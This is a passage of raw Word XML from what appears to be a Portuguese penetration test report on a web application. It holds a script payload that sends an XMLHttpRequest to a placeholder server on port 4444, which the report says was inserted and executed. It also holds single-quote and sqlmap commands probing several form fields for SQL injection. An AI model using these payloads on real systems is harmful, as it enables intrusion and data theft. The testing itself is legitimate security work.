          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP_do</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00881DA5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>servido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porta 4444, de forma síncrona.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5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8B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w: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15F8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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve">); 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r.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET"</w:t>
      </w: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,’http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w: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);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6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>()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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>script&gt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 xml:space="preserve">O sistema </w:t>
      </w:r>
      <w:r w:rsidR="00557D26" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">não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. Independente da sessão d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não ser aberta, o código conseguiu ser inserido e executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82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3.4 Tela Cadastro Lotes de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:b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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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– Exploração via SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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24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 e 22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Tentar realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos campos da tela de Cadastro Lotes de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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Descobrir se o campo Marca/Fabricante é vulnerável a SQL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através das aspas simple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Comando: </w:t>
      </w:r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1</w:t>
      </w:r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‘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uso de aspas simples aqui é o teste mais básico de vulnerabilidade de um campo para SQL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njection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. Imagina-se que haja por baixo uma instrução SQL que possua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where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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param1 = &lt;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parametro_na_interface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&gt;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and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…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Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para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where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param1</w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="gram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= 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.</w:t>
      </w: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46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6B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realize o tratamento dos caracteres para impedir que sejam interpretados como</w:t>
      </w:r>
      <w:r w:rsidR="006C08DA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trecho da consul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594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82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="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘ no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campo </w:t>
      </w:r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Marca/Fabricant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sar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realizar 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e injetar SQL na págin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Salvar a requisição POST capturada pel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em um arquivo a parte para ser utilizado pel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posteriormente.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[2]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r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-p --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current-db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4"/>
        </w:num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comando “-r” informa que as instruções do ataque devem ser carregadas no arquiv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4"/>
        </w:num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p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:num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-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current-db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” solicita que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que tente descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD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90AAD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0AAD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faça o tratamento do</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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parâmetro</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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Erro na ferramenta. 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não reconhece o parâmetro, que está no arquivo indicado no coman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3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Alterar o comando utilizado na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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro solicitado pela ferramen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O comando do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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pede que seja informado um parâmetro para possível injeção de SQL.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Foi esperado que a aplicação fizesse o devido tratamento dos parâmetr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iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando utilizado: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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F15F82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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current-db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F15F82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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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descrição” é o parâmetro que sofrerá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injeção.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD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AAD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01063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spera-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00190AAD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101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00707948" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 16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C1742" w:rsidRPr="00F15F82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1742" w:rsidRPr="00F15F82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C1742" w:rsidRPr="00F15F82" w:rsidRDefault="00BC174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9A29FC" wp14:editId="59498F0C">
            <wp:extent cx="5400040" cy="41338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16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aplicação SQL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Injection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Sqlmap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4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00594AD8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Alterar o comando utilizado </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nas </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>validade”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Foi esperado que a aplicação fizesse o devido tratamento dos parâmetr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entar injeção de SQL no parâmetro “validade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iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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F15F82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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p validade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F15F82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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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validade” é o parâmetro que sofrerá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injeção.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD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AAD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90AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD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  <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “validade”</w:t>
      </w:r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lastRenderedPageBreak/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8C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00190AAD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“validade” escolhido</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00190AAD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 17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D0530" w:rsidRPr="00F15F82" w:rsidRDefault="008D0530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01ABC7" wp14:editId="3927EB21">
            <wp:extent cx="5400040" cy="41719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17</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Resultado exploração </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Inejction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Sqlmap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5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00594AD8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Alterar o comando utilizado </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nas </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s anteriores para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Foi esperado que a aplicação fizesse o devido tratamento dos parâmetr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entar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i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iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F8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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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–r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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–p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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O comando “–r“ indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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 w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é o atributo que sofrerá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inje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71A0F" w:rsidRPr="00F15F82" w:rsidRDefault="00B71A0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B71A0F" w:rsidRPr="00F15F82" w:rsidRDefault="00B71A0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faça o tratamento do parâmetro “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema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”.</w:t>
      </w:r>
      <w:r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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00F15F82"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 w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
